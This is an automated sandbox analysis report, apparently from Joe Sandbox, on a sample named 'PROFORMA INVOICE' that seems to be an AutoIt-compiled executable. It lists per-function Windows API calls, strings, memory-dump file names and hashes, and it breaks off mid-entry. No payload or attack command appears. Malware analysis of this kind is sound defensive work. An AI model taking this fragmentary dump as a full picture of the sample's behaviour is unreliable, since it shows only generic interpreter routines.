SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00F9D09A
_wcscmp.LIBCMT ref: 00F9D0D6
GetClassNameW.USER32(?,?,00000400), ref: 00F9D10D
GetDlgCtrlID.USER32(?), ref: 00F9D15F
GetWindowRect.USER32(?,?), ref: 00F9D195
GetParent.USER32(?), ref: 00F9D1B3
ScreenToClient.USER32(00000000), ref: 00F9D1BA
GetClassNameW.USER32(?,?,00000100), ref: 00F9D234
_wcscmp.LIBCMT ref: 00F9D248
GetWindowTextW.USER32(?,?,00000400), ref: 00F9D26E
_wcscmp.LIBCMT ref: 00F9D282

Strings

%s%u, xrefs: 00F9D02C

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
String ID: %s%u
API String ID: 3119225716-679674701
Opcode ID: 24035d9539a1788c86df367d634b357f903e22933aa57aad38f25a5413e7974a
Instruction ID: 6b08c206302e3f81bf93d5ebc297ec0034043ac7087fe8a9dc90524e73067ee9
Opcode Fuzzy Hash: 24035d9539a1788c86df367d634b357f903e22933aa57aad38f25a5413e7974a
Instruction Fuzzy Hash: D7A11531A04306AFEB15DF60C884FEAB7A8FF44364F204619F999D7090D730E945DBA1

Function 00F9D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00F9D8EB
_wcscmp.LIBCMT ref: 00F9D8FC
GetWindowTextW.USER32(00000001,?,00000400), ref: 00F9D924
CharUpperBuffW.USER32(?,00000000), ref: 00F9D941
_wcscmp.LIBCMT ref: 00F9D95F
_wcsstr.LIBCMT ref: 00F9D970
GetClassNameW.USER32(00000018,?,00000400), ref: 00F9D9A8
_wcscmp.LIBCMT ref: 00F9D9B8
GetWindowTextW.USER32(00000002,?,00000400), ref: 00F9D9DF
GetClassNameW.USER32(00000018,?,00000400), ref: 00F9DA28
_wcscmp.LIBCMT ref: 00F9DA38
GetClassNameW.USER32(00000010,?,00000400), ref: 00F9DA60
GetWindowRect.USER32(00000004,?), ref: 00F9DAC9

Strings

@, xrefs: 00F9D8C6
ThumbnailClass, xrefs: 00F9D9B3, 00F9DA33

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 02a127ecdcce0aa3f27b125d4ebfbb1d1c6917d2e7abc36eaa3fcb68c05d6695
Instruction ID: a5d415fa6ed060ef903ce19f96041682ce31aa93f92d8fd2c8b15cf998a7031b
Opcode Fuzzy Hash: 02a127ecdcce0aa3f27b125d4ebfbb1d1c6917d2e7abc36eaa3fcb68c05d6695
Instruction Fuzzy Hash: 8D81B2314083459FEF01DF14C881BAA7BE8FF84324F244469FD899A096DB34DD45EBA1

Function 00F9D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00F9D753

Strings

CLASSNAME=, xrefs: 00F9D790
[ALL, xrefs: 00F9D7F9
ACTIVE, xrefs: 00F9D72E
LAST, xrefs: 00F9D718
[ACTIVE, xrefs: 00F9D740
HANDLE=, xrefs: 00F9D74C
ALL, xrefs: 00F9D7E7
[CLASS:, xrefs: 00F9D7A3
[REGEXPTITLE:, xrefs: 00F9D77B
[LAST, xrefs: 00F9D800
REGEXP=, xrefs: 00F9D768
[HANDLE:, xrefs: 00F9D75F

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 78af263f2e618f1a3bdc30ad9f1e9ef278d7d9ef540c9e7e8eb951f7d84f2b7e
Instruction ID: 33f9b83e0d1ade33b87b824b7efe7363daad1c54505138abf781f2b62e3a93bf
Opcode Fuzzy Hash: 78af263f2e618f1a3bdc30ad9f1e9ef278d7d9ef540c9e7e8eb951f7d84f2b7e
Instruction Fuzzy Hash: F5316F31A44209AAEF14FB91DE93FEDB364AF20714F700129F581B50D6EB59AE04E652

Function 00F9EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00F9EAB0
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00F9EAC2
SetWindowTextW.USER32(?,?), ref: 00F9EAD9
GetDlgItem.USER32(?,000003EA), ref: 00F9EAEE
SetWindowTextW.USER32(00000000,?), ref: 00F9EAF4
GetDlgItem.USER32(?,000003E9), ref: 00F9EB04
SetWindowTextW.USER32(00000000,?), ref: 00F9EB0A
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00F9EB2B
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00F9EB45
GetWindowRect.USER32(?,?), ref: 00F9EB4E
SetWindowTextW.USER32(?,?), ref: 00F9EBB9
GetDesktopWindow.USER32 ref: 00F9EBBF
GetWindowRect.USER32(00000000), ref: 00F9EBC6
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00F9EC12
GetClientRect.USER32(?,?), ref: 00F9EC1F
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00F9EC44
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00F9EC6F

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: b35ec2e03261c8c0996f2e8bf9ada7965b3b2cffc526eabf3c666092297cf864
Instruction ID: 9009a90bf01948e3ace870bf15fcb5aff26fed9b6bbdad5a9a3c15d9ac02b729
Opcode Fuzzy Hash: b35ec2e03261c8c0996f2e8bf9ada7965b3b2cffc526eabf3c666092297cf864
Instruction Fuzzy Hash: 7D514D71900709AFEB20DFA8CD89B6EBBF5FF44714F004928E686A65A0C775A944EF10

Function 00FB79B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00FB79C6
LoadCursorW.USER32(00000000,00007F00), ref: 00FB79D1
LoadCursorW.USER32(00000000,00007F03), ref: 00FB79DC
LoadCursorW.USER32(00000000,00007F8B), ref: 00FB79E7
LoadCursorW.USER32(00000000,00007F01), ref: 00FB79F2
LoadCursorW.USER32(00000000,00007F81), ref: 00FB79FD
LoadCursorW.USER32(00000000,00007F88), ref: 00FB7A08
LoadCursorW.USER32(00000000,00007F80), ref: 00FB7A13
LoadCursorW.USER32(00000000,00007F86), ref: 00FB7A1E
LoadCursorW.USER32(00000000,00007F83), ref: 00FB7A29
LoadCursorW.USER32(00000000,00007F85), ref: 00FB7A34
LoadCursorW.USER32(00000000,00007F82), ref: 00FB7A3F
LoadCursorW.USER32(00000000,00007F84), ref: 00FB7A4A
LoadCursorW.USER32(00000000,00007F04), ref: 00FB7A55
LoadCursorW.USER32(00000000,00007F02), ref: 00FB7A60
LoadCursorW.USER32(00000000,00007F89), ref: 00FB7A6B
GetCursorInfo.USER32(?), ref: 00FB7A7B

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: bf5d396c22f854db6c4d675524da182709f92675970b64d2bba4775df2b7f19c
Instruction ID: 8133d95f1a6da14310907d67a55bbe2f58bf65062ba258f7f8ec297c86cfd433
Opcode Fuzzy Hash: bf5d396c22f854db6c4d675524da182709f92675970b64d2bba4775df2b7f19c
Instruction Fuzzy Hash: AE3115B1D0831A6ADB509FB68C8999FBFECFF44750F50452BA50DE7280DA7CA5009FA1

Function 00F6C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON

Download Yara Rule

APIs

Part of subcall function 00F7E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00F6C8B7,?,00002000,?,?,00000000,?,00F6419E,?,?,?,00FFDC00), ref: 00F7E984

Part of subcall function 00F6660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F653B1,?,?,00F661FF,?,00000000,00000001,00000000), ref: 00F6662F

__wsplitpath.LIBCMT ref: 00F6C93E

Part of subcall function 00F81DFC: __wsplitpath_helper.LIBCMT ref: 00F81E3C

_wcscpy.LIBCMT ref: 00F6C953
_wcscat.LIBCMT ref: 00F6C968
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00F6C978
SetCurrentDirectoryW.KERNEL32(?), ref: 00F6CABE

Part of subcall function 00F6B337: _wcscpy.LIBCMT ref: 00F6B36F

Strings

#include depth exceeded. Make sure there are no recursive includes, xrefs: 00FD3098
AU3!, xrefs: 00F6C90C
EA06, xrefs: 00FD30C9
>>>AUTOIT SCRIPT<<<, xrefs: 00FD311B
Unterminated string, xrefs: 00FD3470
Error opening the file, xrefs: 00FD30B4, 00FD313D
Bad directive syntax error, xrefs: 00FD3429

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2258743419-1018226102
Opcode ID: 0d1b8b902acd93c4f49c5b86e16dd1822ceb106ae7a2c3187d12f613b0d30c41
Instruction ID: 568ef3ce70ccef476686946953dcd073f8e14c7834589ac77721249cd5a3a887
Opcode Fuzzy Hash: 0d1b8b902acd93c4f49c5b86e16dd1822ceb106ae7a2c3187d12f613b0d30c41
Instruction Fuzzy Hash: 45128A715083419FC724EF24C881AAFBBE5AF99314F04491EF5C993261DB38DA49EB93

Function 00FCCE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FCCEFB
DestroyWindow.USER32(?,?), ref: 00FCCF73
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00FCCFF4
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00FCD016
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FCD025
DestroyWindow.USER32(?), ref: 00FCD042
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F60000,00000000), ref: 00FCD075
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FCD094
GetDesktopWindow.USER32 ref: 00FCD0A9
GetWindowRect.USER32(00000000), ref: 00FCD0B0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00FCD0C2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00FCD0DA

Part of subcall function 00F7B526: GetWindowLongW.USER32(?,000000EB), ref: 00F7B537

Strings

0, xrefs: 00FCCF1B
tooltips_class32, xrefs: 00FCCFED, 00FCD06E

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
String ID: 0$tooltips_class32
API String ID: 3877571568-3619404913
Opcode ID: f602be5ea92b089c1c4adeda362592fadd6ceea07e34b02f9f2be4609a54210a
Instruction ID: fb6096f96d1f7a3ef201d529cf12c4bb532783a57705b6a692b5047fc0c9a83f
Opcode Fuzzy Hash: f602be5ea92b089c1c4adeda362592fadd6ceea07e34b02f9f2be4609a54210a
Instruction Fuzzy Hash: 4871EF71580306AFD720CF28CC86F6A77E5EB88714F14452EF9C58B2A5D775E842EB22

Function 00FCF351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F7B35F

DragQueryPoint.SHELL32(?,?), ref: 00FCF37A

Part of subcall function 00FCD7DE: ClientToScreen.USER32(?,?), ref: 00FCD807
Part of subcall function 00FCD7DE: GetWindowRect.USER32(?,?), ref: 00FCD87D
Part of subcall function 00FCD7DE: PtInRect.USER32(?,?,00FCED5A), ref: 00FCD88D

SendMessageW.USER32(?,000000B0,?,?), ref: 00FCF3E3
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00FCF3EE
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00FCF411
_wcscat.LIBCMT ref: 00FCF441
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00FCF458
SendMessageW.USER32(?,000000B0,?,?), ref: 00FCF471
SendMessageW.USER32(?,000000B1,?,?), ref: 00FCF488
SendMessageW.USER32(?,000000B1,?,?), ref: 00FCF4AA
DragFinish.SHELL32(?), ref: 00FCF4B1
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00FCF59C

Strings

@GUI_DRAGID, xrefs: 00FCF510
@GUI_DROPID, xrefs: 00FCF4D1
@GUI_DRAGFILE, xrefs: 00FCF54B

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 00118bde740b7603d37548b52047ec08360a26dbdc66664c61e0276167ca0b4e
Instruction ID: d5b20627d8a6a71ad09d101f071f1aa42783d3fe97d492f716bcb2ebde3e9ed9
Opcode Fuzzy Hash: 00118bde740b7603d37548b52047ec08360a26dbdc66664c61e0276167ca0b4e
Instruction Fuzzy Hash: 4C616872108305AFC311EF60CC86EAFBBF8EF99710F000A1EF595961A1DB759A09DB52

Function 00FAAAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00FAAB3D
VariantCopy.OLEAUT32(?,?), ref: 00FAAB46
VariantClear.OLEAUT32(?), ref: 00FAAB52
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00FAAC40
__swprintf.LIBCMT ref: 00FAAC70
VarR8FromDec.OLEAUT32(?,?), ref: 00FAAC9C
VariantInit.OLEAUT32(?), ref: 00FAAD4D
SysFreeString.OLEAUT32(00000016), ref: 00FAADDF
VariantClear.OLEAUT32(?), ref: 00FAAE35
VariantClear.OLEAUT32(?), ref: 00FAAE44
VariantInit.OLEAUT32(00000000), ref: 00FAAE80

Strings

Default, xrefs: 00FAACFD
%4d%02d%02d%02d%02d%02d, xrefs: 00FAAC6A

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: c02a566ee6cda32457e9b107fafb36ed4f02d660c8c8626a951f545fd5d03f2c
Instruction ID: edadc6f12c01c49fcca6be5c0a976b37e67e0aa6a3ab7ae5cde4ad35248c4ed8
Opcode Fuzzy Hash: c02a566ee6cda32457e9b107fafb36ed4f02d660c8c8626a951f545fd5d03f2c
Instruction Fuzzy Hash: E4D1FFB2A04205DBDB20DF65C884B6EB7B5FF46750F148056E4459B2C4DB78EC48FBA2

Function 00FC716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00FC71FC
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FC7247

Strings

ISCHECKED, xrefs: 00FC73B2
GETITEMCOUNT, xrefs: 00FC7311
GETSELECTED, xrefs: 00FC733F
CHECK, xrefs: 00FC7267
COLLAPSE, xrefs: 00FC728D
EXISTS, xrefs: 00FC72B0
GETTEXT, xrefs: 00FC7382
UNCHECK, xrefs: 00FC740B
EXPAND, xrefs: 00FC72E1
SELECT, xrefs: 00FC73E0
GETTOTALCOUNT, xrefs: 00FC722A

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 2d78379b0249968771a441d38e1ebbdd2643e944be5054fafe5ffb6f6c12b3dc
Instruction ID: 371eb98a8a4926f08cd0fee19617bcdf95a779189ad7f026e41df3b172844645
Opcode Fuzzy Hash: 2d78379b0249968771a441d38e1ebbdd2643e944be5054fafe5ffb6f6c12b3dc
Instruction Fuzzy Hash: CE9165352087019BDA05FF10C952B6EB7A5BF54310F04885DF8965B3A2DB79ED06EF81

Function 00FCE4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00FCE5AB
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00FC9808,?), ref: 00FCE607
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FCE647
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FCE68C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FCE6C3
FreeLibrary.KERNEL32(?,00000004,?,?,?,00FC9808,?), ref: 00FCE6CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FCE6DF
DestroyIcon.USER32(?), ref: 00FCE6EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00FCE70B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00FCE717

Part of subcall function 00F80FA7: __wcsicmp_l.LIBCMT ref: 00F81030

Strings

.dll, xrefs: 00FCE564
.icl, xrefs: 00FCE521
.exe, xrefs: 00FCE541

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 8af01933d7f0ea0817b3ab1f6ef4b65e4f497c0fad25259d78b81c2f97e8a8c2
Instruction ID: 4ffd4c5313367a394d78b798ec08d8e708f95d9f79dfb0d706f1a6620946b140
Opcode Fuzzy Hash: 8af01933d7f0ea0817b3ab1f6ef4b65e4f497c0fad25259d78b81c2f97e8a8c2
Instruction Fuzzy Hash: 0D61E371A1021ABAEB14DF64CD86FFE7BA8BB18724F104519F911DA1D0EB749980EB60

Function 00FAD219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00F6936C: __swprintf.LIBCMT ref: 00F693AB
Part of subcall function 00F6936C: __itow.LIBCMT ref: 00F693DF

CharLowerBuffW.USER32(?,?), ref: 00FAD292
GetDriveTypeW.KERNEL32 ref: 00FAD2DF
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FAD327
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FAD35E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FAD38C

Strings

close cd wait, xrefs: 00FAD377
set cd door , xrefs: 00FAD32D
open, xrefs: 00FAD2B9
wait, xrefs: 00FAD349
close, xrefs: 00FAD298
closed, xrefs: 00FAD2A6, 00FAD2AF
type cdaudio alias cd wait, xrefs: 00FAD30A
open , xrefs: 00FAD2EE

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1148790751-4113822522
Opcode ID: a711946c8500be214d858c182e49d2faaec4adef2c714727a183d3a1e70c4634
Instruction ID: a1525f0fab865c69b62d1ff9640f6691b4bbfbcd6b68ce8734b057e12b2dbf7d
Opcode Fuzzy Hash: a711946c8500be214d858c182e49d2faaec4adef2c714727a183d3a1e70c4634
Instruction Fuzzy Hash: 93512BB55043059FC700EF10C88196AB7E8FF99768F40885DF89AAB261DB35ED05EB92

Function 00FA26BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00FD3973,00000016,0000138C,00000016,?,00000016,00FFDDB4,00000000,?), ref: 00FA26F1
LoadStringW.USER32(00000000,?,00FD3973,00000016), ref: 00FA26FA
GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00FD3973,00000016,0000138C,00000016,?,00000016,00FFDDB4,00000000,?,00000016), ref: 00FA271C
LoadStringW.USER32(00000000,?,00FD3973,00000016), ref: 00FA271F
__swprintf.LIBCMT ref: 00FA276F
__swprintf.LIBCMT ref: 00FA2780
_wprintf.LIBCMT ref: 00FA2829
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FA2840

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00FA2824
Error: , xrefs: 00FA27F7
^ ERROR, xrefs: 00FA27D5
Line %d:, xrefs: 00FA277A
Line %d (File "%s"):, xrefs: 00FA2769

Memory Dump Source

